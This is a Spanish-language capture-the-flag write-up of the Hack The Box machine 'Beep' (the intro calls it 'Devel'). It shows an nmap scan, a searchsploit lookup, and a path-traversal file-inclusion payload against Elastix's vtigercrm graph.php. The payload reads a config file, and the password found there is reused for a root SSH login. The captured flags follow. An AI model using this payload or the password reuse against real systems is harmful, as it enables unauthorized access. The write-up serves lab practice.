LaCashita!

[HTB] Beep

Hoy vamos a hackear la maquina de HTB llamada Devel.

Video

Enumeration

Para empezar hacemos un nmap para ver que puertos tiene abiertos.


sml@Cassandra:~$ nmap -A -p- 10.10.10.7
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 15:17 CEST
Nmap scan report for 10.10.10.7
Host is up (0.043s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, 
ENHANCEDST
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE USER UIDL EXPIRE(NEVER) 
IMPLEMENTATION(Cyrus POP
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: IDLE NAMESPACE MULTIAPPEND OK ACL ATOMIC URLAUTHA0001 
X-NETSCAPENCES ANNOTATEMORE CHILDREN RENAME CATENATE ID CONDSTORE NO LITERAL+ 
IMAP4rev1 SORT=
443/tcp   open  ssl/https?
|_ssl-date: 2020-05-09T13:21:41+00:00; +1s from scanner time.
879/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 
(include
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: 
Unix

Service detection performed. Please report any incorrect results at 
https://nmap.org
Nmap done: 1 IP address (1 host up) scanned in 378.53 seconds

Al visitar http://10.10.10.7 podemos ver que se trata de elastix. Buscamos algun exploit que pueda servirnos.


sml@Cassandra:~$ searchsploit elastix
------------------------------------------- 
----------------------------------------
 Exploit Title                             |  Path
                                           | (/usr/share/exploitdb/)
------------------------------------------- 
----------------------------------------
Elastix - 'page' Cross-Site Scripting      | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vu | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Script | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inc | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection          | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection         | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Co | exploits/php/webapps/18650.py
------------------------------------------- 
----------------------------------------
Shellcodes: No Result

Exploitation

Usaremos Elastix 2.2.0 - 'graph.php' Local File Inc, vamos a ver que hace el exploit.


sml@Cassandra:~$ cat /usr/share/exploitdb/exploits/php/webapps/37637.pl
---SNIP---
#LFI Exploit: 
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf
%00&module=Accounts&action
---SNIP---

Bien, se trata de un LFI, asi que lo probamos visitando: https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../../ /etc/amportal.conf%00&module=Accounts&action En todo el texto que aparece, el que nos interesa es el siguiente: AMPMGRPASS=jEhdIekWmdjE Nos logueamos utilizando la password encontrada en el paso anterior.


sml@Cassandra:~$ ssh root@10.10.10.7
Unable to negotiate with 10.10.10.7 port 22: no matchinTheir offer: 
diffie-hellman-group-exchange-sha1,diffie-ellman-group1-sha1
sml@Cassandra:~$ ssh -oKexAlgorithms=+diffie-hellman-gr
The authenticity of host '10.10.10.7 (10.10.10.7)' can'
RSA key fingerprint is SHA256:Ip2MswIVDX1AIEPoLiHsMFfdg
Are you sure you want to continue connecting (yes/no/[f
Warning: Permanently added '10.10.10.7' (RSA) to the li
root@10.10.10.7's password: 
Last login: Tue Jul 16 11:45:47 2019

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate worksta
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon)el)

user.txt


[root@beep ~]# cd /home
[root@beep home]# ls
fanis  spamfilter
[root@beep home]# cd fanis
[root@beep fanis]# ls
user.txt
[root@beep fanis]# cat user.txt
aeff3def0c765c2677b94715cffa73ac

root.txt


[root@beep fanis]# cd /root
[root@beep ~]# ls
anaconda-ks.cfg		   install.log.syslog  webmin-1
elastix-pr-2.2-1.i386.rpm  postnochroot
install.log		   root.txt
[root@beep ~]# cat root.txt
d88e006123842106982acce0aaf453f0
[root@beep ~]#

End

Y con esto ya tendriamos el flag del "user" y el flag de "root".